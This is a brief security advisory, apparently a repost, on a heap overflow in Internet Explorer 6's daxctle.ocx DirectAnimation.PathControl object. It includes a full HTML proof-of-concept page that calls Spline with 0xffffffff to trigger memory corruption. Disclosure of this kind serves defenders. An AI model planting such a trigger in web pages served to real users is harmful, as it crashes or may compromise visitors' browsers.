‘Microsoft Internet Explorer daxctle.ocx Heap Overflow’

Summary

Microsoft Internet Explorer is vulnerable to an heap overflow attack when it handles a DirectAnimation.PathControl COM object.’

Credit:

‘The information has been provided by nop.
The original article can be found at:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19


Details

Vulnerable Systems:
 * Windows 2000/XP/2003 Internet Explorer 6.0 SP1

When Internet Explorer handles an DirectAnimation.PathControl COM object (daxctle.ocx) Spline method, Setting the first parameter to 0xffffffff will triggers an invalid memory write, That way, an attacker may DoS and possibly could execute arbitrary code.

Exploit:
<!–
// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:WINNTsystem32daxctle.ocx

–!>
<html>
<head>
<title>test</title>
</head>
<body>
<script>

var target = new ActiveXObject(‘DirectAnimation.PathControl’);

target.Spline(0xffffffff, 1);

</script>
</body>
</html>’

Categories: Windows